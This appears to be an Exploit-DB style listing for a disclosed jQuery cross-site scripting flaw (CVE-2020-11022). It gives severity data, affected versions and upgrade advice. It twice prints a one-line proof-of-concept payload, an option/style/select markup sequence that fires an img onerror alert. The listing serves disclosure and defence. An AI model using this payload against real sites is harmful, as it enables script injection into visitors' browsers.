header-logo
Suggest Exploit
vendor:
jQuery
by:
Central InfoSec
6.1
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: jQuery
Affected Version From: jQuery 1.2
Affected Version To: jQuery 3.5.0
Patch Exists: YES
Related CWE: CVE-2020-11022
CPE: jquery
Other Scripts: N/A
Platforms Tested: None
2020

jQuery 1.2 – Cross-Site Scripting (XSS)

A Cross-Site Scripting (XSS) vulnerability exists in jQuery versions greater than or equal to 1.2 and before 3.5.0. An attacker can inject malicious code into the vulnerable application, which will be executed in the victim's browser. Proof of Concept 1: <option><style></option></select><img src=x onerror=alert(1)></style>

Mitigation:

Developers should upgrade to jQuery version 3.5.0 or later to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: jQuery 1.2 - Cross-Site Scripting (XSS)
# Date: 04/29/2020
# Exploit Author: Central InfoSec
# Version: jQuery versions greater than or equal to 1.2 and before 3.5.0
# CVE : CVE-2020-11022

# Proof of Concept 1:
<option><style></option></select><img src=x onerror=alert(1)></style>